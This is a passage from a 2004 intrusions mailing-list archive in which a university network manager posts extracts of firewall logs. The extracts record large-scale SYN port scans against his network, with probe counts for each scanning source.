Jul 6 00:56:54 218.24.172.209:3957 -> xxx.yyy.235.100:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3955 -> xxx.yyy.235.99:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3958 -> xxx.yyy.235.101:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3964 -> xxx.yyy.235.102:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3966 -> xxx.yyy.235.103:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3967 -> xxx.yyy.235.104:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3974 -> xxx.yyy.235.105:9898 SYN ******S* Jul 6 00:56:54 218.24.172.209:3975 -> xxx.yyy.235.106:9898 SYN ******S* 12853 Jul 6 00:57:50 218.24.86.238:3212 -> xxx.yyy.72.127:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4372 -> xxx.yyy.72.127:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3219 -> xxx.yyy.72.128:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4375 -> xxx.yyy.72.128:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3224 -> xxx.yyy.72.131:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4378 -> xxx.yyy.72.131:1023 SYN ******S* Jul 6 00:57:50 218.24.86.238:3228 -> xxx.yyy.72.135:5554 SYN ******S* Jul 6 00:57:51 218.24.86.238:4409 -> xxx.yyy.72.135:1023 SYN ******S* [...] Jul 6 00:58:31 218.24.86.238:1219 -> xxx.yyy.92.235:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1220 -> xxx.yyy.92.236:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1227 -> xxx.yyy.92.243:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1236 -> xxx.yyy.92.240:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1237 -> xxx.yyy.92.241:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1238 -> xxx.yyy.92.242:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1239 -> xxx.yyy.92.246:9898 SYN ******S* Jul 6 00:58:31 218.24.86.238:1240 -> xxx.yyy.92.239:9898 SYN ******S* 11882 [...] 
6569 Jul 6 00:56:12 221.216.32.111:4816 -> xxx.yyy.72.124:5554 SYN ******S* Jul 6 00:56:13 221.216.32.111:1704 -> xxx.yyy.72.124:1023 SYN ******S* Jul 6 00:56:15 221.216.32.111:3175 -> xxx.yyy.72.124:9898 SYN ******S* Jul 6 00:56:12 221.216.32.111:4817 -> xxx.yyy.72.128:5554 SYN ******S* Jul 6 00:56:13 221.216.32.111:1705 -> xxx.yyy.72.128:1023 SYN ******S* Jul 6 00:56:15 221.216.32.111:3176 -> xxx.yyy.72.128:9898 SYN ******S* Jul 6 00:56:12 221.216.32.111:4838 -> xxx.yyy.72.136:5554 SYN ******S* Jul 6 00:56:12 221.216.32.111:4818 -> xxx.yyy.72.129:5554 SYN ******S* [...] Jul 6 00:56:53 221.216.32.111:1870 -> xxx.yyy.92.145:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1948 -> xxx.yyy.92.160:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1956 -> xxx.yyy.92.161:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1975 -> xxx.yyy.92.163:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1978 -> xxx.yyy.92.165:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:1977 -> xxx.yyy.92.164:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2260 -> xxx.yyy.92.202:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2307 -> xxx.yyy.92.238:9898 SYN ******S* Jul 6 00:56:54 221.216.32.111:2314 -> xxx.yyy.92.244:9898 SYN ******S* 5953 Jul 6 00:56:44 218.65.245.92:2488 -> xxx.yyy.215.237:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2966 -> xxx.yyy.215.237:1023 SYN ******S* Jul 6 00:56:44 218.65.245.92:2496 -> xxx.yyy.215.229:5554 SYN ******S* Jul 6 00:56:44 218.65.245.92:2503 -> xxx.yyy.215.222:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2980 -> xxx.yyy.215.222:1023 SYN ******S* Jul 6 00:56:44 218.65.245.92:2498 -> xxx.yyy.215.227:5554 SYN ******S* Jul 6 00:56:46 218.65.245.92:2975 -> xxx.yyy.215.227:1023 SYN ******S* Jul 6 00:56:44 218.65.245.92:2502 -> xxx.yyy.215.223:5554 SYN ******S* [...] 
Jul 6 00:57:59 218.65.245.92:2547 -> xxx.yyy.236.18:9898 SYN ******S* Jul 6 00:57:59 218.65.245.92:2625 -> xxx.yyy.236.70:9898 SYN ******S* Jul 6 00:57:59 218.65.245.92:2657 -> xxx.yyy.236.65:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2711 -> xxx.yyy.236.73:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2709 -> xxx.yyy.236.75:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2708 -> xxx.yyy.236.76:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2644 -> xxx.yyy.236.20:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2653 -> xxx.yyy.236.25:9898 SYN ******S* Jul 6 00:58:00 218.65.245.92:2609 -> xxx.yyy.236.62:9898 SYN ******S* 5801 Jul 6 04:59:15 82.254.35.217:1030 -> xxx.yyy.1.0:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1031 -> xxx.yyy.1.1:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1032 -> xxx.yyy.1.2:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1033 -> xxx.yyy.1.3:1433 SYN ******S* Jul 6 04:59:15 82.254.35.217:1034 -> xxx.yyy.1.4:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1035 -> xxx.yyy.1.5:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1036 -> xxx.yyy.1.6:1433 SYN ******S* Jul 6 04:59:12 82.254.35.217:1037 -> xxx.yyy.1.7:1433 SYN ******S* [...] 
Jul 6 05:38:23 82.254.35.217:4113 -> xxx.yyy.17.253:1433 SYN ******S* Jul 6 05:38:23 82.254.35.217:4114 -> xxx.yyy.17.254:1433 SYN ******S* Jul 6 05:38:23 82.254.35.217:4115 -> xxx.yyy.17.255:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4109 -> xxx.yyy.17.251:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4110 -> xxx.yyy.17.252:1433 SYN ******S* Jul 6 05:38:29 82.254.35.217:4113 -> xxx.yyy.17.253:1433 SYN ******S* Jul 6 05:38:30 82.254.35.217:4114 -> xxx.yyy.17.254:1433 SYN ******S* Jul 6 05:38:30 82.254.35.217:4115 -> xxx.yyy.17.255:1433 SYN ******S* 5698 Jul 6 00:46:00 219.140.88.41:4322 -> xxx.yyy.215.215:5554 SYN ******S* Jul 6 00:46:01 219.140.88.41:4493 -> xxx.yyy.215.215:1023 SYN ******S* Jul 6 00:46:00 219.140.88.41:4325 -> xxx.yyy.215.213:5554 SYN ******S* Jul 6 00:46:01 219.140.88.41:4321 -> xxx.yyy.215.214:5554 SYN ******S* Jul 6 00:46:02 219.140.88.41:4492 -> xxx.yyy.215.214:1023 SYN ******S* Jul 6 00:46:04 219.140.88.41:1074 -> xxx.yyy.215.214:9898 SYN ******S* Jul 6 00:46:01 219.140.88.41:4316 -> xxx.yyy.215.210:5554 SYN ******S* Jul 6 00:46:02 219.140.88.41:4484 -> xxx.yyy.215.210:1023 SYN ******S* [...] 
Jul 6 00:47:53 219.140.88.41:2945 -> xxx.yyy.236.17:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2947 -> xxx.yyy.236.23:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2961 -> xxx.yyy.236.41:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2957 -> xxx.yyy.236.37:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2984 -> xxx.yyy.236.43:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:3006 -> xxx.yyy.236.53:9898 SYN ******S* Jul 6 00:47:53 219.140.88.41:2934 -> xxx.yyy.236.30:9898 SYN ******S* Jul 6 00:47:54 219.140.88.41:3244 -> xxx.yyy.236.69:9898 SYN ******S* Jul 6 00:47:55 219.140.88.41:3246 -> xxx.yyy.236.71:9898 SYN ******S* 5683 Jul 6 00:55:59 61.49.138.129:4167 -> xxx.yyy.64.0:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4908 -> xxx.yyy.64.0:1023 SYN ******S* Jul 6 00:56:02 61.49.138.129:1841 -> xxx.yyy.64.0:9898 SYN ******S* Jul 6 00:55:59 61.49.138.129:4176 -> xxx.yyy.64.1:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4914 -> xxx.yyy.64.1:1023 SYN ******S* Jul 6 00:56:02 61.49.138.129:1844 -> xxx.yyy.64.1:9898 SYN ******S* Jul 6 00:55:59 61.49.138.129:4183 -> xxx.yyy.64.2:5554 SYN ******S* Jul 6 00:56:00 61.49.138.129:4939 -> xxx.yyy.64.2:1023 SYN ******S* [...] 
-- 
- Ken
===========================================================================
Ken Connelly (KC152)  Systems and Operations Manager, ITS - Network Services
University of Northern Iowa  Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu  phone: (319) 273-5850  fax: (319) 273-7373

From Ken.Connelly at uni.edu Thu Jul 8 12:31:06 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Thu, 08 Jul 2004 07:31:06 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC7LH85VWK8YBZ2Y@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.
Jul 7 00:57:52 221.218.18.109:3215 -> xxx.yyy.153.111:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3226 -> xxx.yyy.153.113:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3220 -> xxx.yyy.153.112:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3230 -> xxx.yyy.153.114:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3234 -> xxx.yyy.153.115:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3237 -> xxx.yyy.153.117:9898 SYN ******S* Jul 7 00:57:53 221.218.18.109:3919 -> xxx.yyy.153.118:9898 SYN ******S* Jul 7 00:57:53 221.218.18.109:3922 -> xxx.yyy.153.119:9898 SYN ******S* 13143 Jul 7 23:56:41 220.127.123.230:1146 -> xxx.yyy.154.245:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4899 -> xxx.yyy.154.245:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:4704 -> xxx.yyy.154.232:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4506 -> xxx.yyy.154.232:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:4705 -> xxx.yyy.154.233:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4507 -> xxx.yyy.154.233:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:1441 -> xxx.yyy.154.248:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4926 -> xxx.yyy.154.248:1023 SYN ******S* [...] 
Jul 7 23:57:27 220.127.123.230:4604 -> xxx.yyy.156.35:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4609 -> xxx.yyy.156.37:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4421 -> xxx.yyy.156.24:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4438 -> xxx.yyy.156.25:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4468 -> xxx.yyy.156.27:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4473 -> xxx.yyy.156.28:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4492 -> xxx.yyy.156.30:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4498 -> xxx.yyy.156.31:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4606 -> xxx.yyy.156.36:9898 SYN ******S* 12798 Jul 7 04:41:18 61.217.39.19:1856 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 04:41:18 61.217.39.19:1857 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 04:41:18 61.217.39.19:1858 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 04:41:19 61.217.39.19:1860 -> xxx.yyy.1.5:4899 SYN ******S* Jul 7 04:41:19 61.217.39.19:1861 -> xxx.yyy.1.6:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1863 -> xxx.yyy.1.8:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1864 -> xxx.yyy.1.9:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1865 -> xxx.yyy.1.10:4899 SYN ******S* [...] 
Jul 7 05:09:20 61.217.39.19:2821 -> xxx.yyy.81.121:4899 SYN ******S* Jul 7 05:09:20 61.217.39.19:2822 -> xxx.yyy.81.122:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2823 -> xxx.yyy.81.123:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2824 -> xxx.yyy.81.124:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2828 -> xxx.yyy.81.128:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2825 -> xxx.yyy.81.125:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2829 -> xxx.yyy.81.129:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2826 -> xxx.yyy.81.126:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2827 -> xxx.yyy.81.127:4899 SYN ******S* 12685 Jul 7 00:56:49 221.217.209.25:2497 -> xxx.yyy.215.240:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3042 -> xxx.yyy.215.240:1023 SYN ******S* Jul 7 00:56:52 221.217.209.25:3952 -> xxx.yyy.215.240:9898 SYN ******S* Jul 7 00:56:49 221.217.209.25:2495 -> xxx.yyy.215.243:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3019 -> xxx.yyy.215.243:1023 SYN ******S* Jul 7 00:56:52 221.217.209.25:3920 -> xxx.yyy.215.243:9898 SYN ******S* Jul 7 00:56:49 221.217.209.25:2496 -> xxx.yyy.215.241:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3020 -> xxx.yyy.215.241:1023 SYN ******S* [...] 
Jul 7 00:57:36 221.217.209.25:4058 -> xxx.yyy.236.36:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4059 -> xxx.yyy.236.37:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4069 -> xxx.yyy.236.38:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4070 -> xxx.yyy.236.39:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4084 -> xxx.yyy.236.40:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4085 -> xxx.yyy.236.41:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4087 -> xxx.yyy.236.43:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4088 -> xxx.yyy.236.44:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4089 -> xxx.yyy.236.45:9898 SYN ******S* 12409 Jul 7 00:56:33 61.55.212.113:1276 -> xxx.yyy.174.5:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4629 -> xxx.yyy.174.5:1023 SYN ******S* Jul 7 00:56:36 61.55.212.113:4835 -> xxx.yyy.174.5:9898 SYN ******S* Jul 7 00:56:33 61.55.212.113:1219 -> xxx.yyy.174.2:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4597 -> xxx.yyy.174.2:1023 SYN ******S* Jul 7 00:56:36 61.55.212.113:4830 -> xxx.yyy.174.2:9898 SYN ******S* Jul 7 00:56:33 61.55.212.113:1231 -> xxx.yyy.174.3:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4619 -> xxx.yyy.174.3:1023 SYN ******S* [...] 
Jul 7 00:57:36 61.55.212.113:4884 -> xxx.yyy.193.212:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4878 -> xxx.yyy.193.211:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4885 -> xxx.yyy.193.213:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4893 -> xxx.yyy.193.214:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4919 -> xxx.yyy.193.218:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4896 -> xxx.yyy.193.215:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3737 -> xxx.yyy.194.123:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3740 -> xxx.yyy.194.124:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3734 -> xxx.yyy.194.122:9898 SYN ******S* 12386 Jul 7 00:54:05 221.192.68.104:2100 -> xxx.yyy.236.95:5554 SYN ******S* Jul 7 00:54:07 221.192.68.104:3044 -> xxx.yyy.236.95:1023 SYN ******S* Jul 7 00:54:05 221.192.68.104:2102 -> xxx.yyy.236.93:5554 SYN ******S* Jul 7 00:54:06 221.192.68.104:3045 -> xxx.yyy.236.93:1023 SYN ******S* Jul 7 00:54:05 221.192.68.104:2097 -> xxx.yyy.236.99:5554 SYN ******S* Jul 7 00:54:06 221.192.68.104:2987 -> xxx.yyy.236.99:1023 SYN ******S* Jul 7 00:54:08 221.192.68.104:1180 -> xxx.yyy.236.99:9898 SYN ******S* Jul 7 00:54:05 221.192.68.104:2104 -> xxx.yyy.236.91:5554 SYN ******S* [...] 
Jul 7 00:54:46 221.192.68.104:2321 -> xxx.yyy.255.232:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2336 -> xxx.yyy.255.247:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2334 -> xxx.yyy.255.246:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2333 -> xxx.yyy.255.245:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2343 -> xxx.yyy.255.239:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2354 -> xxx.yyy.255.240:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2351 -> xxx.yyy.255.241:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2352 -> xxx.yyy.255.243:9898 SYN ******S* 10766 Jul 7 00:56:28 221.217.157.102:4876 -> xxx.yyy.153.137:5554 SYN ******S* Jul 7 00:56:31 221.217.157.102:3250 -> xxx.yyy.153.137:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4879 -> xxx.yyy.153.138:5554 SYN ******S* Jul 7 00:56:31 221.217.157.102:3251 -> xxx.yyy.153.138:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4882 -> xxx.yyy.153.136:5554 SYN ******S* Jul 7 00:56:29 221.217.157.102:1614 -> xxx.yyy.153.136:1023 SYN ******S* Jul 7 00:56:31 221.217.157.102:3320 -> xxx.yyy.153.136:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4890 -> xxx.yyy.153.139:5554 SYN ******S* [...] 
Jul 7 00:57:13 221.217.157.102:2629 -> xxx.yyy.173.164:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2781 -> xxx.yyy.173.255:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2783 -> xxx.yyy.174.1:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2795 -> xxx.yyy.173.252:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2794 -> xxx.yyy.173.248:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2817 -> xxx.yyy.173.247:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2819 -> xxx.yyy.173.244:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2821 -> xxx.yyy.173.227:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2825 -> xxx.yyy.174.2:9898 SYN ******S* 10398 Jul 7 01:09:00 218.61.154.25:3644 -> xxx.yyy.64.0:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3977 -> xxx.yyy.64.0:1023 SYN ******S* Jul 7 01:09:03 218.61.154.25:3047 -> xxx.yyy.64.0:9898 SYN ******S* Jul 7 01:09:00 218.61.154.25:3645 -> xxx.yyy.64.1:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3978 -> xxx.yyy.64.1:1023 SYN ******S* Jul 7 01:09:03 218.61.154.25:3048 -> xxx.yyy.64.1:9898 SYN ******S* Jul 7 01:09:00 218.61.154.25:3646 -> xxx.yyy.64.2:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3979 -> xxx.yyy.64.2:1023 SYN ******S* [...] 
Jul 7 01:09:24 218.61.154.25:3349 -> xxx.yyy.72.117:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3350 -> xxx.yyy.72.118:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3352 -> xxx.yyy.72.120:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3351 -> xxx.yyy.72.119:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3353 -> xxx.yyy.72.122:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3354 -> xxx.yyy.72.121:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3356 -> xxx.yyy.72.123:9898 SYN ******S*
Jul 7 01:09:24 218.61.154.25:3357 -> xxx.yyy.72.124:9898 SYN ******S*
6241

--
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From Ken.Connelly at uni.edu Fri Jul 9 12:46:13 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Fri, 09 Jul 2004 07:46:13 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC90BASQPW8YBZ2Y@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 8 18:18:31 220.76.135.154:5116 -> xxx.yyy.1.0:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:3070 -> xxx.yyy.1.2:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:5119 -> xxx.yyy.1.3:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:3074 -> xxx.yyy.1.6:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:3069 -> xxx.yyy.1.1:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:3072 -> xxx.yyy.1.4:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:3073 -> xxx.yyy.1.5:25 SYN ******S*
Jul 8 18:18:31 220.76.135.154:1028 -> xxx.yyy.1.7:25 SYN ******S*
[...]
Jul 8 18:24:38 220.76.135.154:1911 -> xxx.yyy.255.247:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:1924 -> xxx.yyy.255.253:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3969 -> xxx.yyy.255.250:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3953 -> xxx.yyy.255.245:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3954 -> xxx.yyy.255.246:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3974 -> xxx.yyy.255.254:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3962 -> xxx.yyy.255.248:25 SYN ******S*
Jul 8 18:24:38 220.76.135.154:3970 -> xxx.yyy.255.251:25 SYN ******S*
111015

Jul 8 16:33:56 218.162.51.187:3115 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 8 16:33:56 218.162.51.187:3116 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 8 16:33:56 218.162.51.187:3117 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 8 16:33:53 218.162.51.187:3118 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 8 16:33:53 218.162.51.187:3119 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 8 16:33:56 218.162.51.187:3120 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 8 16:33:56 218.162.51.187:3121 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 8 16:33:56 218.162.51.187:3122 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 8 16:45:02 218.162.51.187:3884 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3902 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3904 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3905 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3906 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3907 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3908 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 8 16:45:02 218.162.51.187:3909 -> xxx.yyy.255.254:1433 SYN ******S*
74110

Jul 8 05:16:37 216.55.155.39:3868 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3869 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3870 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3871 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3872 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3873 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3875 -> xxx.yyy.1.8:1433 SYN ******S*
Jul 8 05:16:37 216.55.155.39:3874 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 8 05:27:31 216.55.155.39:4751 -> xxx.yyy.255.170:1433 SYN ******S*
Jul 8 05:27:31 216.55.155.39:4752 -> xxx.yyy.255.171:1433 SYN ******S*
Jul 8 05:27:31 216.55.155.39:4753 -> xxx.yyy.255.172:1433 SYN ******S*
Jul 8 05:27:31 216.55.155.39:4754 -> xxx.yyy.255.173:1433 SYN ******S*
Jul 8 05:27:31 216.55.155.39:4755 -> xxx.yyy.255.174:1433 SYN ******S*
Jul 8 05:27:31 216.55.155.39:4756 -> xxx.yyy.255.175:1433 SYN ******S*
Jul 8 05:27:32 216.55.155.39:4758 -> xxx.yyy.255.177:1433 SYN ******S*
Jul 8 05:27:32 216.55.155.39:4760 -> xxx.yyy.255.178:1433 SYN ******S*
Jul 8 05:27:32 216.55.155.39:4761 -> xxx.yyy.255.179:1433 SYN ******S*
73658

Jul 8 13:56:54 80.80.19.12:3950 -> xxx.yyy.1.1:139 SYN ******S*
Jul 8 13:56:54 80.80.19.12:3951 -> xxx.yyy.1.2:139 SYN ******S*
Jul 8 13:56:51 80.80.19.12:3952 -> xxx.yyy.1.3:139 SYN ******S*
Jul 8 13:56:51 80.80.19.12:3953 -> xxx.yyy.1.4:139 SYN ******S*
Jul 8 13:56:54 80.80.19.12:3954 -> xxx.yyy.1.5:139 SYN ******S*
Jul 8 13:56:54 80.80.19.12:3955 -> xxx.yyy.1.6:139 SYN ******S*
Jul 8 13:56:54 80.80.19.12:3956 -> xxx.yyy.1.7:139 SYN ******S*
Jul 8 13:56:54 80.80.19.12:3957 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 8 14:07:51 80.80.19.12:3304 -> xxx.yyy.255.243:139 SYN ******S*
Jul 8 14:07:51 80.80.19.12:3305 -> xxx.yyy.255.244:139 SYN ******S*
Jul 8 14:07:51 80.80.19.12:3311 -> xxx.yyy.255.250:139 SYN ******S*
Jul 8 14:07:51 80.80.19.12:3308 -> xxx.yyy.255.247:139 SYN ******S*
Jul 8 14:07:51 80.80.19.12:3309 -> xxx.yyy.255.248:139 SYN ******S*
Jul 8 14:07:52 80.80.19.12:3313 -> xxx.yyy.255.252:139 SYN ******S*
Jul 8 14:07:52 80.80.19.12:3314 -> xxx.yyy.255.253:139 SYN ******S*
Jul 8 14:07:52 80.80.19.12:3315 -> xxx.yyy.255.254:139 SYN ******S*
72718

Jul 8 19:40:36 212.239.30.80:2718 -> xxx.yyy.1.1:6129 SYN ******S*
Jul 8 19:40:36 212.239.30.80:2719 -> xxx.yyy.1.2:6129 SYN ******S*
Jul 8 19:40:36 212.239.30.80:2720 -> xxx.yyy.1.3:6129 SYN ******S*
Jul 8 19:40:38 212.239.30.80:2721 -> xxx.yyy.1.4:6129 SYN ******S*
Jul 8 19:40:38 212.239.30.80:2722 -> xxx.yyy.1.5:6129 SYN ******S*
Jul 8 19:40:38 212.239.30.80:2723 -> xxx.yyy.1.6:6129 SYN ******S*
Jul 8 19:40:38 212.239.30.80:2724 -> xxx.yyy.1.7:6129 SYN ******S*
Jul 8 19:40:38 212.239.30.80:2725 -> xxx.yyy.1.8:6129 SYN ******S*
[...]
Jul 8 19:52:21 212.239.30.80:1553 -> xxx.yyy.255.248:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1547 -> xxx.yyy.255.242:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1550 -> xxx.yyy.255.245:6129 SYN ******S*
